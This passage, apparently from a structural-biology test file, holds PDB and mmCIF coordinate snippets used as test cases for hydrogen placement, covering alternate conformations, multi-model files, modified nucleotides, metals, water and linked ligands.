ATOM 10 HA PRO H 1 52.877 -73.212 35.203 1.00 20.01 H
ATOM 11 HB2 PRO H 1 54.949 -74.711 35.461 1.00 22.06 H
ATOM 12 HB3 PRO H 1 53.499 -75.228 35.856 1.00 22.06 H
ATOM 13 HG2 PRO H 1 54.830 -75.664 33.385 1.00 25.16 H
ATOM 14 HG3 PRO H 1 54.147 -76.775 34.292 1.00 25.16 H
ATOM 15 HD3 PRO H 1 52.801 -75.872 32.361 1.00 17.36 H
ATOM 16 HD2 PRO H 1 52.048 -76.072 33.746 1.00 17.36 H
ATOM 17 N SER H 2 54.727 -71.646 35.038 1.00 21.70 N
ATOM 18 CA SER H 2 55.670 -70.537 34.874 1.00 25.33 C
ATOM 19 C SER H 2 55.049 -69.401 34.057 1.00 24.78 C
ATOM 20 O SER H 2 55.581 -68.291 34.023 1.00 27.51 O
ATOM 21 CB SER H 2 56.982 -71.005 34.219 1.00 25.20 C
ATOM 22 OG SER H 2 56.914 -70.938 32.802 1.00 28.91 O
ATOM 23 H SER H 2 54.335 -71.634 35.803 1.00 21.70 H
ATOM 24 HA SER H 2 55.899 -70.163 35.739 1.00 25.33 H
ATOM 25 HB2 SER H 2 57.705 -70.434 34.524 1.00 25.20 H
ATOM 26 HB3 SER H 2 57.151 -71.924 34.481 1.00 25.20 H
ATOM 27 HG SER H 2 56.769 -70.147 32.558 1.00 28.91 H
ATOM 28 N GLN H 3 53.918 -69.678 33.412 1.00 24.55 N
ATOM 29 CA GLN H 3 53.224 -68.673 32.611 1.00 29.39 C
ATOM 30 C GLN H 3 52.340 -67.778 33.475 1.00 28.13 C
ATOM 31 O GLN H 3 52.234 -67.987 34.681 1.00 26.35 O
ATOM 32 CB GLN H 3 52.371 -69.346 31.533 1.00 31.67 C
ATOM 33 CG GLN H 3 53.196 -70.112 30.524 1.00 44.80 C
ATOM 34 CD GLN H 3 54.379 -69.303 30.030 1.00 48.55 C
ATOM 35 OE1 GLN H 3 54.213 -68.269 29.386 1.00 52.45 O
ATOM 36 NE2 GLN H 3 55.584 -69.766 30.342 1.00 55.07 N
ATOM 37 H GLN H 3 53.530 -70.445 33.423 1.00 24.55 H
ATOM 38 HA GLN H 3 53.888 -68.112 32.179 1.00 29.39 H
ATOM 39 HB2 GLN H 3 51.871 -68.665 31.056 1.00 31.67 H
ATOM 40 HB3 GLN H 3 51.761 -69.970 31.957 1.00 31.67 H
ATOM 41 HG2 GLN H 3 53.533 -70.922 30.937 1.00 44.80 H
ATOM 42 HG3 GLN H 3 52.641 -70.335 29.761 1.00 44.80 H
ATOM 43 HE21 GLN H 3 56.287 -69.343 30.085 1.00 55.07 H
ATOM 44 HE22 GLN H 3 55.661 -70.489 30.801 1.00 55.07 H
"""
pdb_str_001 = """
REMARK this fails in REDUCE because of clash between LYS 246 NZ & Tam 2 C5
CRYST1 24.984 25.729 23.590 90.00 90.00 90.00 P 1
ATOM 1 N PRO A 245 13.194 10.192 16.658 1.00 41.32 N
ATOM 2 CA PRO A 245 12.939 11.276 15.705 1.00 43.09 C
ATOM 3 C PRO A 245 13.983 11.305 14.601 1.00 46.16 C
ATOM 4 O PRO A 245 15.086 10.768 14.728 1.00 44.69 O
ATOM 5 CB PRO A 245 13.007 12.541 16.569 1.00 42.50 C
ATOM 6 CG PRO A 245 13.795 12.147 17.772 1.00 47.69 C
ATOM 7 CD PRO A 245 13.504 10.698 18.006 1.00 45.37 C
REMARK ATOM 8 H2 PRO A 245 12.414 9.635 16.709 1.00 41.32 H
REMARK ATOM 9 H3 PRO A 245 13.938 9.673 16.344 1.00 41.32 H
ATOM 10 HA PRO A 245 12.051 11.211 15.320 1.00 43.09 H
ATOM 11 HB2 PRO A 245 13.452 13.251 16.080 1.00 42.50 H
ATOM 12 HB3 PRO A 245 12.112 12.820 16.817 1.00 42.50 H
ATOM 13 HG2 PRO A 245 14.740 12.283 17.601 1.00 47.69 H
ATOM 14 HG3 PRO A 245 13.515 12.679 18.533 1.00 47.69 H
ATOM 15 HD2 PRO A 245 14.279 10.246 18.375 1.00 45.37 H
ATOM 16 HD3 PRO A 245 12.744 10.590 18.598 1.00 45.37 H
ATOM 17 N LYS A 246 13.611 11.942 13.495 1.00 42.99 N
ATOM 18 CA LYS A 246 14.551 12.132 12.404 1.00 43.44 C
ATOM 19 C LYS A 246 15.633 13.122 12.832 1.00 46.25 C
ATOM 20 O LYS A 246 15.332 14.110 13.510 1.00 45.93 O
ATOM 21 CB LYS A 246 13.837 12.652 11.156 1.00 49.81 C
ATOM 22 CG LYS A 246 12.652 11.809 10.713 1.00 54.70 C
ATOM 23 CD LYS A 246 13.071 10.649 9.829 1.00 62.40 C
ATOM 24 CE LYS A 246 11.928 9.661 9.640 1.00 71.25 C
ATOM 25 NZ LYS A 246 10.594 10.329 9.556 1.00 76.52 N
ATOM 26 H LYS A 246 12.828 12.269 13.355 1.00 42.99 H
ATOM 27 HA LYS A 246 14.966 11.285 12.179 1.00 43.44 H
ATOM 28 HB2 LYS A 246 14.472 12.674 10.423 1.00 49.81 H
ATOM 29 HB3 LYS A 246 13.509 13.547 11.338 1.00 49.81 H
ATOM 30 HG2 LYS A 246 12.208 11.447 11.496 1.00 54.70 H
ATOM 31 HG3 LYS A 246 12.036 12.365 10.210 1.00 54.70 H
ATOM 32 HD2 LYS A 246 13.815 10.182 10.241 1.00 62.40 H
ATOM 33 HD3 LYS A 246 13.332 10.985 8.958 1.00 62.40 H
ATOM 34 HE2 LYS A 246 11.910 9.050 10.393 1.00 71.25 H
ATOM 35 HE3 LYS A 246 12.069 9.168 8.816 1.00 71.25 H
REMARK ATOM 36 HZ1 LYS A 246 9.955 9.720 9.446 1.00 76.52 H
REMARK ATOM 37 HZ2 LYS A 246 10.578 10.892 8.867 1.00 76.52 H
REMARK ATOM 38 HZ3 LYS A 246 10.434 10.784 10.304 1.00 76.52 H
ATOM 39 N PRO A 247 16.897 12.890 12.459 1.00 44.07 N
ATOM 40 CA PRO A 247 17.961 13.810 12.905 1.00 39.69 C
ATOM 41 C PRO A 247 17.659 15.272 12.622 1.00 41.96 C
ATOM 42 O PRO A 247 17.848 16.127 13.497 1.00 43.51 O
ATOM 43 CB PRO A 247 19.188 13.316 12.126 1.00 43.94 C
ATOM 44 CG PRO A 247 18.912 11.884 11.852 1.00 47.67 C
ATOM 45 CD PRO A 247 17.430 11.781 11.650 1.00 44.76 C
ATOM 46 HA PRO A 247 18.124 13.716 13.857 1.00 39.69 H
ATOM 47 HB3 PRO A 247 19.279 13.817 11.300 1.00 43.94 H
ATOM 48 HB2 PRO A 247 19.987 13.419 12.667 1.00 43.94 H
ATOM 49 HG2 PRO A 247 19.193 11.346 12.609 1.00 47.67 H
ATOM 50 HG3 PRO A 247 19.387 11.607 11.053 1.00 47.67 H
ATOM 51 HD2 PRO A 247 17.201 11.896 10.714 1.00 44.76 H
ATOM 52 HD3 PRO A 247 17.097 10.929 11.971 1.00 44.76 H
TER
HETATM 53 N TAM H 2 9.323 12.496 7.335 1.00 20.00 N
HETATM 54 C TAM H 2 8.060 12.492 8.002 1.00 20.00 C
HETATM 55 C1 TAM H 2 7.540 13.901 8.071 1.00 20.00 C
HETATM 56 C2 TAM H 2 8.386 11.881 9.335 1.00 20.00 C
HETATM 57 C3 TAM H 2 7.035 11.686 7.294 1.00 20.00 C
HETATM 58 C4 TAM H 2 7.128 14.539 6.744 1.00 20.00 C
HETATM 59 C5 TAM H 2 8.930 10.458 9.271 1.00 20.00 C
HETATM 60 C6 TAM H 2 5.660 11.992 7.821 1.00 20.00 C
HETATM 61 O4 TAM H 2 5.710 14.391 6.585 1.00 20.00 O
HETATM 62 O5 TAM H 2 7.872 9.487 9.299 1.00 20.00 O
HETATM 63 O6 TAM H 2 5.714 12.262 9.200 1.00 20.00 O
"""
pdb_str_002 = """
REMARK This is a multi model file --> check if this works
CRYST1 16.760 20.171 17.648 90.00 90.00 90.00 P 1
MODEL 1
ATOM 1 N GLY A -3 14.573 7.304 5.082 1.00 23.20 N
ATOM 2 CA GLY A -3 15.503 6.752 6.050 1.00 43.12 C
ATOM 3 C GLY A -3 16.822 7.516 6.092 1.00 10.33 C
ATOM 4 O GLY A -3 17.833 7.000 5.608 1.00 34.23 O
ATOM 5 HA2 GLY A -3 15.692 5.828 5.822 1.00 43.12 H
ATOM 6 HA3 GLY A -3 15.103 6.784 6.933 1.00 43.12 H
ATOM 7 N PRO A -2 16.855 8.759 6.667 1.00 43.42 N
ATOM 8 CA PRO A -2 18.084 9.573 6.756 1.00 72.12 C
ATOM 9 C PRO A -2 19.050 9.085 7.843 1.00 24.33 C
ATOM 10 O PRO A -2 20.269 9.138 7.662 1.00 1.42 O
ATOM 11 CB PRO A -2 17.569 10.986 7.098 1.00 65.32 C
ATOM 12 CG PRO A -2 16.078 10.915 7.005 1.00 23.11 C
ATOM 13 CD PRO A -2 15.713 9.483 7.257 1.00 3.14 C
ATOM 14 HA PRO A -2 18.527 9.578 5.893 1.00 72.12 H
ATOM 15 HB2 PRO A -2 17.846 11.226 7.996 1.00 65.32 H
ATOM 16 HB3 PRO A -2 17.923 11.625 6.460 1.00 65.32 H
ATOM 17 HG2 PRO A -2 15.793 11.190 6.120 1.00 23.11 H
ATOM 18 HG3 PRO A -2 15.682 11.493 7.676 1.00 23.11 H
ATOM 19 HD2 PRO A -2 15.639 9.304 8.207 1.00 3.14 H
ATOM 20 HD3 PRO A -2 14.884 9.250 6.810 1.00 3.14 H
ATOM 21 N SER A -1 18.485 8.603 8.974 1.00 54.30 N
ATOM 22 CA SER A -1 19.258 8.090 10.133 1.00 74.21 C
ATOM 23 C SER A -1 20.126 9.182 10.770 1.00 44.31 C
ATOM 24 O SER A -1 20.919 9.834 10.087 1.00 24.24 O
ATOM 25 CB SER A -1 20.129 6.881 9.741 1.00 35.31 C
ATOM 26 OG SER A -1 20.678 6.247 10.885 1.00 34.24 O
ATOM 27 H SER A -1 17.635 8.561 9.098 1.00 54.30 H
ATOM 28 HA SER A -1 18.623 7.790 10.802 1.00 74.21 H
ATOM 29 HB2 SER A -1 20.854 7.187 9.174 1.00 35.31 H
ATOM 30 HB3 SER A -1 19.580 6.241 9.261 1.00 35.31 H
ATOM 31 HG SER A -1 21.157 6.789 11.312 1.00 34.24 H
TER
ENDMDL
MODEL 2
ATOM 35 N GLY A -3 15.598 12.155 12.730 1.00 23.20 N
ATOM 36 CA GLY A -3 15.801 13.217 11.761 1.00 43.12 C
ATOM 37 C GLY A -3 15.603 12.746 10.322 1.00 10.33 C
ATOM 38 O GLY A -3 14.940 11.727 10.105 1.00 34.23 O
ATOM 39 HA3 GLY A -3 15.172 13.934 11.936 1.00 43.12 H
ATOM 40 HA2 GLY A -3 16.704 13.561 11.848 1.00 43.12 H
ATOM 41 N PRO A -2 16.164 13.467 9.301 1.00 43.42 N
ATOM 42 CA PRO A -2 16.028 13.090 7.880 1.00 72.12 C
ATOM 43 C PRO A -2 16.904 11.891 7.491 1.00 24.33 C
ATOM 44 O PRO A -2 16.479 11.039 6.705 1.00 1.42 O
ATOM 45 CB PRO A -2 16.479 14.351 7.114 1.00 65.32 C
ATOM 46 CG PRO A -2 16.651 15.418 8.147 1.00 23.11 C
ATOM 47 CD PRO A -2 16.953 14.708 9.432 1.00 3.14 C
ATOM 48 HA PRO A -2 15.094 12.906 7.692 1.00 72.12 H
ATOM 49 HB2 PRO A -2 17.317 14.174 6.659 1.00 65.32 H
ATOM 50 HB3 PRO A -2 15.799 14.602 6.470 1.00 65.32 H
ATOM 51 HG3 PRO A -2 15.832 15.932 8.224 1.00 23.11 H
ATOM 52 HG2 PRO A -2 17.386 15.999 7.896 1.00 23.11 H
ATOM 53 HD2 PRO A -2 17.900 14.513 9.508 1.00 3.14 H
ATOM 54 HD3 PRO A -2 16.659 15.229 10.196 1.00 3.14 H
ATOM 55 N SER A -1 18.123 11.839 8.047 1.00 54.30 N
ATOM 56 CA SER A -1 19.064 10.752 7.768 1.00 74.21 C
ATOM 57 C SER A -1 19.650 10.188 9.066 1.00 44.31 C
ATOM 58 O SER A -1 19.683 8.969 9.256 1.00 24.24 O
ATOM 59 CB SER A -1 20.187 11.243 6.843 1.00 35.31 C
ATOM 60 OG SER A -1 20.983 10.164 6.382 1.00 34.24 O
ATOM 61 H SER A -1 18.429 12.428 8.594 1.00 54.30 H
ATOM 62 HA SER A -1 18.597 10.032 7.316 1.00 74.21 H
ATOM 63 HB2 SER A -1 20.750 11.861 7.334 1.00 35.31 H
ATOM 64 HB3 SER A -1 19.791 11.690 6.079 1.00 35.31 H
ATOM 65 HG SER A -1 21.333 9.767 7.034 1.00 34.24 H
TER
ENDMDL
"""
pdb_str_003 = """
REMARK PDB snippet with a normal and a modified nucleic acid
CRYST1 17.826 22.060 19.146 90.00 90.00 90.00 P 1
ATOM 1 P U A 2 7.236 16.525 9.726 1.00 37.21 P
ATOM 2 OP1 U A 2 6.663 17.060 10.993 1.00 38.75 O
ATOM 3 OP2 U A 2 8.650 16.805 9.385 1.00 34.84 O
ATOM 4 O5' U A 2 7.029 14.947 9.685 1.00 34.31 O
ATOM 5 C5' U A 2 5.756 14.354 9.974 1.00 37.02 C
ATOM 6 C4' U A 2 5.821 12.860 9.763 1.00 36.81 C
ATOM 7 O4' U A 2 5.957 12.552 8.350 1.00 36.96 O
ATOM 8 C3' U A 2 7.025 12.178 10.388 1.00 36.55 C
ATOM 9 O3' U A 2 6.846 11.969 11.775 1.00 36.22 O
ATOM 10 C2' U A 2 7.106 10.884 9.592 1.00 36.94 C
ATOM 11 O2' U A 2 6.138 9.930 9.980 1.00 38.55 O
ATOM 12 C1' U A 2 6.755 11.383 8.191 1.00 36.22 C
ATOM 13 N1 U A 2 7.938 11.735 7.391 1.00 34.47 N
ATOM 14 C2 U A 2 8.652 10.705 6.795 1.00 33.67 C
ATOM 15 O2 U A 2 8.375 9.526 6.954 1.00 33.54 O
ATOM 16 N3 U A 2 9.706 11.110 6.014 1.00 33.13 N
ATOM 17 C4 U A 2 10.119 12.408 5.784 1.00 32.43 C
ATOM 18 O4 U A 2 11.043 12.620 5.000 1.00 31.05 O
ATOM 19 C5 U A 2 9.352 13.409 6.464 1.00 33.80 C
ATOM 20 C6 U A 2 8.316 13.048 7.223 1.00 33.46 C
ATOM 21 H4* U A 2 5.000 12.459 10.088 1.00 36.81 H
ATOM 22 H3* U A 2 7.826 12.702 10.232 1.00 36.55 H
ATOM 23 H2* U A 2 7.997 10.505 9.648 1.00 36.94 H
ATOM 24 HO2* U A 2 5.578 9.841 9.360 1.00 38.55 H
ATOM 25 H1* U A 2 6.256 10.694 7.724 1.00 36.22 H
ATOM 26 H5 U A 2 9.576 14.307 6.377 1.00 33.80 H
ATOM 27 H5*2 U A 2 5.515 14.540 10.895 1.00 37.02 H
ATOM 28 H5*1 U A 2 5.082 14.734 9.388 1.00 37.02 H
ATOM 29 H3 U A 2 10.157 10.489 5.626 1.00 33.13 H
ATOM 30 H6 U A 2 7.829 13.711 7.657 1.00 33.46 H
HETATM 31 P UMS A 3 8.115 12.049 12.757 1.00 35.65 P
HETATM 32 OP1 UMS A 3 7.608 12.006 14.146 1.00 37.56 O
HETATM 33 OP2 UMS A 3 8.986 13.173 12.329 1.00 35.79 O
HETATM 34 O5' UMS A 3 8.946 10.722 12.449 1.00 37.12 O
HETATM 35 C5' UMS A 3 8.323 9.447 12.591 1.00 36.88 C
HETATM 36 C4' UMS A 3 9.203 8.363 12.041 1.00 39.11 C
HETATM 37 O4' UMS A 3 9.187 8.277 10.585 1.00 38.36 O
HETATM 38 C3' UMS A 3 10.640 8.278 12.458 1.00 40.33 C
HETATM 39 O3' UMS A 3 10.895 8.001 13.828 1.00 40.80 O
HETATM 40 C2' UMS A 3 11.291 7.467 11.374 1.00 40.93 C
HETATM 41 C1' UMS A 3 10.496 7.904 10.133 1.00 38.75 C
HETATM 42 N1 UMS A 3 11.106 9.042 9.429 1.00 36.80 N
HETATM 43 C2 UMS A 3 12.013 8.736 8.436 1.00 35.25 C
HETATM 44 O2 UMS A 3 12.328 7.589 8.163 1.00 36.36 O
HETATM 45 N3 UMS A 3 12.557 9.822 7.786 1.00 33.98 N
HETATM 46 C4 UMS A 3 12.275 11.159 7.996 1.00 32.51 C
HETATM 47 O4 UMS A 3 12.826 12.001 7.302 1.00 33.01 O
HETATM 48 C5 UMS A 3 11.323 11.402 9.046 1.00 33.90 C
HETATM 49 C6 UMS A 3 10.817 10.354 9.743 1.00 34.62 C
HETATM 50 CA' UMS A 3 11.776 5.000 13.480 1.00 46.26 C
HETATM 51 SE2' UMS A 3 10.815 5.400 11.905 1.00 48.17 Se
HETATM 53 H3* UMS A 3 11.022 9.152 12.279 1.00 40.33 H
HETATM 54 H3 UMS A 3 13.140 9.648 7.179 1.00 33.98 H
HETATM 55 H1* UMS A 3 10.387 7.156 9.525 1.00 38.75 H
HETATM 56 H6 UMS A 3 10.252 10.527 10.462 1.00 34.62 H
HETATM 57 H4* UMS A 3 8.782 7.553 12.369 1.00 39.11 H
HETATM 58 H5*2 UMS A 3 7.481 9.448 12.109 1.00 36.88 H
HETATM 59 H5 UMS A 3 11.056 12.270 9.246 1.00 33.90 H
HETATM 60 H5* UMS A 3 8.158 9.276 13.531 1.00 36.88 H
HETATM 64 H2* UMS A 3 12.022 6.833 11.440 1.00 40.93 H
"""
pdb_str_004 = '''
REMARK TYR double conformation where *every* atom is in either A or B
CRYST1 15.639 15.148 16.657 90.00 90.00 90.00 P 1
ATOM 1 N ATYR A 59 5.624 5.492 5.997 0.63 5.05 N
ATOM 2 CA ATYR A 59 6.283 5.821 7.250 0.63 5.48 C
ATOM 3 C ATYR A 59 5.451 6.841 8.030 0.63 6.01 C
ATOM 4 O ATYR A 59 5.000 7.863 7.506 0.63 6.38 O
ATOM 5 CB ATYR A 59 7.724 6.421 6.963 0.63 5.57 C
ATOM 6 CG ATYR A 59 8.212 7.215 8.170 0.63 6.71 C
ATOM 7 CD1ATYR A 59 8.690 6.541 9.297 0.63 7.05 C
ATOM 8 CD2ATYR A 59 8.071 8.583 8.242 0.63 8.31 C
ATOM 9 CE1ATYR A 59 9.100 7.172 10.481 0.63 7.99 C
ATOM 10 CE2ATYR A 59 8.408 9.230 9.447 0.63 9.07 C
ATOM 11 CZ ATYR A 59 8.919 8.547 10.507 0.63 9.01 C
ATOM 12 OH ATYR A 59 9.211 9.255 11.657 0.63 12.31 O
ATOM 13 HA ATYR A 59 6.384 5.020 7.788 0.63 5.48 H
ATOM 14 HB2ATYR A 59 7.683 7.014 6.196 0.63 5.57 H
ATOM 15 HB3ATYR A 59 8.349 5.699 6.792 0.63 5.57 H
ATOM 16 HD1ATYR A 59 8.740 5.613 9.260 0.63 7.05 H
ATOM 17 HD2ATYR A 59 7.760 9.068 7.512 0.63 8.31 H
ATOM 18 HE1ATYR A 59 9.466 6.703 11.196 0.63 7.99 H
ATOM 19 HE2ATYR A 59 8.278 10.148 9.520 0.63 9.07 H
ATOM 20 HH ATYR A 59 9.058 10.072 11.538 0.63 12.31 H
ATOM 21 N BTYR A 59 5.613 5.513 5.963 0.37 5.75 N
ATOM 22 CA BTYR A 59 6.322 5.809 7.211 0.37 5.49 C
ATOM 23 C BTYR A 59 5.795 6.953 8.094 0.37 5.14 C
ATOM 24 O BTYR A 59 5.668 8.090 7.641 0.37 6.42 O
ATOM 25 CB BTYR A 59 7.798 6.076 6.900 0.37 7.77 C
ATOM 26 CG BTYR A 59 8.556 6.722 8.038 0.37 5.20 C
ATOM 27 CD1BTYR A 59 9.162 5.951 9.021 0.37 8.94 C
ATOM 28 CD2BTYR A 59 8.665 8.103 8.129 0.37 6.25 C
ATOM 29 CE1BTYR A 59 9.856 6.537 10.063 0.37 11.97 C
ATOM 30 CE2BTYR A 59 9.357 8.699 9.167 0.37 9.52 C
ATOM 31 CZ BTYR A 59 9.950 7.911 10.131 0.37 12.68 C
ATOM 32 OH BTYR A 59 10.639 8.500 11.166 0.37 26.50 O
ATOM 33 HA BTYR A 59 6.185 5.019 7.758 0.37 5.49 H
ATOM 34 HB2BTYR A 59 7.853 6.669 6.134 0.37 7.77 H
ATOM 35 HB3BTYR A 59 8.231 5.232 6.698 0.37 7.77 H
ATOM 36 HD1BTYR A 59 9.100 5.024 8.978 0.37 8.94 H
ATOM 37 HD2BTYR A 59 8.266 8.637 7.480 0.37 6.25 H
ATOM 38 HE1BTYR A 59 10.257 6.008 10.714 0.37 11.97 H
ATOM 39 HE2BTYR A 59 9.422 9.625 9.215 0.37 9.52 H
ATOM 40 HH BTYR A 59 10.618 9.336 11.086 0.37 26.50 H
'''
pdb_str_005 = '''
REMARK Glu double conformation where atoms are either A, B or '' (blank)
CRYST1 13.702 13.985 14.985 90.00 90.00 90.00 P 1
ATOM 1 N GLU A 78 8.702 8.360 5.570 1.00 35.65 N
ATOM 2 C GLU A 78 6.379 7.842 5.202 1.00 35.59 C
ATOM 3 O GLU A 78 5.975 8.985 5.000 1.00 35.38 O
ATOM 4 CA AGLU A 78 7.598 7.571 6.076 0.70 35.57 C
ATOM 5 CB AGLU A 78 7.301 7.887 7.536 0.70 35.75 C
ATOM 6 CG AGLU A 78 6.481 6.798 8.188 0.70 36.10 C
ATOM 7 CD AGLU A 78 5.833 7.232 9.476 0.70 37.70 C
ATOM 8 OE1AGLU A 78 6.155 8.333 9.982 0.70 38.74 O
ATOM 9 OE2AGLU A 78 5.000 6.456 9.985 0.70 37.65 O
ATOM 10 HA AGLU A 78 7.819 6.627 6.051 0.70 35.57 H
ATOM 11 HB2AGLU A 78 6.802 8.717 7.588 0.70 35.75 H
ATOM 12 HB3AGLU A 78 8.137 7.971 8.021 0.70 35.75 H
ATOM 13 HG2AGLU A 78 5.778 6.526 7.578 0.70 36.10 H
ATOM 14 HG3AGLU A 78 7.059 6.044 8.385 0.70 36.10 H
ATOM 15 CA BGLU A 78 7.581 7.608 6.115 0.30 35.61 C
ATOM 16 CB BGLU A 78 7.269 8.093 7.534 0.30 35.70 C
ATOM 17 CG BGLU A 78 6.166 7.322 8.245 0.30 36.05 C
ATOM 18 CD BGLU A 78 6.683 6.115 9.003 0.30 36.79 C
ATOM 19 OE1BGLU A 78 7.585 6.285 9.856 0.30 37.19 O
ATOM 20 OE2BGLU A 78 6.173 5.000 8.760 0.30 37.31 O
ATOM 21 HA BGLU A 78 7.779 6.660 6.170 0.30 35.61 H
ATOM 22 HB2BGLU A 78 8.073 8.013 8.070 0.30 35.70 H
ATOM 23 HB3BGLU A 78 6.992 9.022 7.488 0.30 35.70 H
ATOM 24 HG3BGLU A 78 5.525 7.010 7.587 0.30 36.05 H
ATOM 25 HG2BGLU A 78 5.730 7.910 8.881 0.30 36.05 H
'''
pdb_str_006 = '''
REMARK Hg, Sr and HOH: no H atoms are expected to be placed
CRYST1 10.286 24.260 13.089 90.00 90.00 90.00 P 1
HETATM 1 HG HG A 101 5.000 7.056 5.951 0.60 17.71 HG
HETATM 2 SR SR A 102 5.182 10.793 8.089 0.85 18.78 SR
HETATM 3 O HOH A 201 5.093 5.000 5.000 1.00 25.34 O
HETATM 4 O HOH A 202 5.286 19.260 7.818 1.00 28.43 O
'''
# check if mmCIF file works
pdb_str_007 = '''
data_1UBQ
#
_entry.id 1UBQ
#
_cell.entry_id 1UBQ
_cell.length_a 50.840
_cell.length_b 42.770
_cell.length_c 28.950
_cell.angle_alpha 90.00
_cell.angle_beta 90.00
_cell.angle_gamma 90.00
_cell.Z_PDB 4
#
_symmetry.entry_id 1UBQ
_symmetry.space_group_name_H-M 'P 21 21 21'
_symmetry.Int_Tables_number 19
#
loop_
_atom_site.group_PDB
_atom_site.id
_atom_site.type_symbol
_atom_site.label_atom_id
_atom_site.label_alt_id
_atom_site.label_comp_id
_atom_site.label_asym_id
_atom_site.label_entity_id
_atom_site.label_seq_id
_atom_site.pdbx_PDB_ins_code
_atom_site.Cartn_x
_atom_site.Cartn_y
_atom_site.Cartn_z
_atom_site.occupancy
_atom_site.B_iso_or_equiv
_atom_site.pdbx_formal_charge
_atom_site.auth_seq_id
_atom_site.auth_comp_id
_atom_site.auth_asym_id
_atom_site.auth_atom_id
_atom_site.pdbx_PDB_model_num
ATOM 594 N N . GLY A 1 75 ? 41.165 35.531 31.898 0.25 36.31 ? 75 GLY A N 1
ATOM 595 C CA . GLY A 1 75 ? 41.845 36.550 32.686 0.25 36.07 ? 75 GLY A CA 1
ATOM 596 C C . GLY A 1 75 ? 41.251 37.941 32.588 0.25 36.16 ? 75 GLY A C 1
ATOM 597 O O . GLY A 1 75 ? 41.102 38.523 31.500 0.25 36.26 ? 75 GLY A O 1
ATOM 598 H HA2 . GLY A 1 75 ? 42.768 36.603 32.393 0.25 36.07 ? 75 GLY A HA3 1
ATOM 599 H HA3 . GLY A 1 75 ? 41.823 36.286 33.619 0.25 36.07 ? 75 GLY A HA2 1
ATOM 600 N N . GLY A 1 76 ? 40.946 38.472 33.757 0.25 36.05 ? 76 GLY A N 1
ATOM 601 C CA . GLY A 1 76 ? 40.373 39.813 33.944 0.25 36.19 ? 76 GLY A CA 1
ATOM 602 C C . GLY A 1 76 ? 40.031 39.992 35.432 0.25 36.20 ? 76 GLY A C 1
ATOM 603 O O . GLY A 1 76 ? 38.933 40.525 35.687 0.25 36.13 ? 76 GLY A O 1
ATOM 604 O OXT . GLY A 1 76 ? 40.862 39.575 36.251 0.25 36.27 ? 76 GLY A OXT 1
ATOM 605 H H . GLY A 1 76 ? 41.063 38.062 34.504 0.25 36.05 ? 76 GLY A H 1
ATOM 606 H HA3 . GLY A 1 76 ? 39.566 39.910 33.413 0.25 36.19 ? 76 GLY A HA3 1
ATOM 607 H HA2 . GLY A 1 76 ? 41.011 40.491 33.675 0.25 36.19 ? 76 GLY A HA2 1
HETATM 611 O O . HOH B 2 . ? 45.747 30.081 19.708 1.00 12.43 ? 77 HOH A O 1
'''
pdb_str_008 = '''
REMARK disulfide bond with altloc
CRYST1 13.626 15.799 17.617 90.00 90.00 90.00 P 1
ATOM 1 N CYS A 27 17.541 4.439 12.897 1.00 13.99 N
ATOM 2 CA CYS A 27 16.566 5.527 12.862 1.00 14.57 C
ATOM 3 C CYS A 27 16.236 6.026 11.467 1.00 14.53 C
ATOM 4 O CYS A 27 15.254 6.760 11.351 1.00 16.95 O
ATOM 5 CB CYS A 27 17.114 6.698 13.662 1.00 15.77 C
ATOM 6 SG CYS A 27 17.230 6.332 15.443 1.00 17.57 S
ATOM 7 HA CYS A 27 15.739 5.186 13.237 1.00 14.57 H
ATOM 8 HB2 CYS A 27 16.526 7.461 13.549 1.00 15.77 H
ATOM 9 HB3 CYS A 27 18.003 6.913 13.340 1.00 15.77 H
ATOM 10 CB CYS A 123 14.607 7.591 16.260 1.00 24.16 C
ATOM 11 SG CYS A 123 15.316 5.939 15.946 1.00 20.05 S
ATOM 12 N ACYS A 123 15.023 7.279 18.624 0.58 26.40 N
ATOM 14 CA ACYS A 123 15.266 8.190 17.491 0.58 25.69 C
ATOM 15 C ACYS A 123 14.764 9.599 17.776 0.58 26.33 C
ATOM 16 O ACYS A 123 14.197 10.238 16.886 0.58 28.70 O
ATOM 17 OXTACYS A 123 14.975 10.081 18.878 0.58 28.31 O
ATOM 18 HA ACYS A 123 16.217 8.287 17.324 0.58 25.69 H
ATOM 19 HB2ACYS A 123 13.652 7.502 16.408 1.00 24.16 H
ATOM 20 HB3ACYS A 123 14.772 8.157 15.490 1.00 24.16 H
ATOM 22 N BCYS A 123 15.023 7.288 18.685 0.42 25.68 N
ATOM 23 CA BCYS A 123 15.108 8.205 17.548 0.42 25.86 C
ATOM 24 C BCYS A 123 14.270 9.460 17.813 0.42 26.42 C
ATOM 26 O BCYS A 123 13.915 10.125 16.837 0.42 27.75 O
ATOM 27 OXTBCYS A 123 13.981 9.728 18.968 0.42 28.04 O
ATOM 28 HA BCYS A 123 16.045 8.426 17.432 0.42 25.86 H
ATOM 29 HB2BCYS A 123 13.642 7.500 16.307 1.00 24.16 H
ATOM 30 HB3BCYS A 123 14.850 8.168 15.519 1.00 24.16 H
'''
pdb_str_009 = '''
REMARK 1KYC: SIN is linked to GLU 1, but at end of model file
CRYST1 19.769 30.000 32.270 90.00 90.00 90.00 P 1
ATOM 1 N GLU A 1 9.100 10.903 6.846 1.00 18.32 N
ATOM 2 CA GLU A 1 8.321 10.315 7.917 1.00 16.97 C
ATOM 3 C GLU A 1 9.162 9.612 8.973 1.00 15.25 C
ATOM 4 O GLU A 1 8.910 9.774 10.170 1.00 14.23 O
ATOM 5 CB GLU A 1 7.291 9.304 7.380 1.00 17.54 C
ATOM 6 CG GLU A 1 6.485 8.581 8.454 1.00 19.79 C
ATOM 7 CD GLU A 1 5.488 9.479 9.156 1.00 20.81 C
ATOM 8 OE1 GLU A 1 5.000 10.445 8.534 1.00 23.39 O
ATOM 9 OE2 GLU A 1 5.180 9.223 10.333 1.00 21.60 O
ATOM 10 HA GLU A 1 7.863 11.056 8.343 1.00 16.97 H
ATOM 11 HB2 GLU A 1 6.662 9.777 6.812 1.00 17.54 H
ATOM 12 HB3 GLU A 1 7.761 8.630 6.865 1.00 17.54 H
ATOM 13 HG2 GLU A 1 7.094 8.232 9.123 1.00 19.79 H
ATOM 14 HG3 GLU A 1 5.993 7.854 8.042 1.00 19.79 H
ATOM 15 N GLU A 2 10.111 8.769 8.574 1.00 15.28 N
ATOM 16 CA GLU A 2 10.916 8.018 9.519 1.00 14.99 C
ATOM 17 C GLU A 2 11.541 8.882 10.615 1.00 13.85 C
ATOM 18 O GLU A 2 11.362 8.667 11.822 1.00 13.88 O
ATOM 19 CB GLU A 2 12.024 7.270 8.757 1.00 16.20 C
ATOM 20 CG GLU A 2 12.869 6.426 9.713 1.00 17.22 C
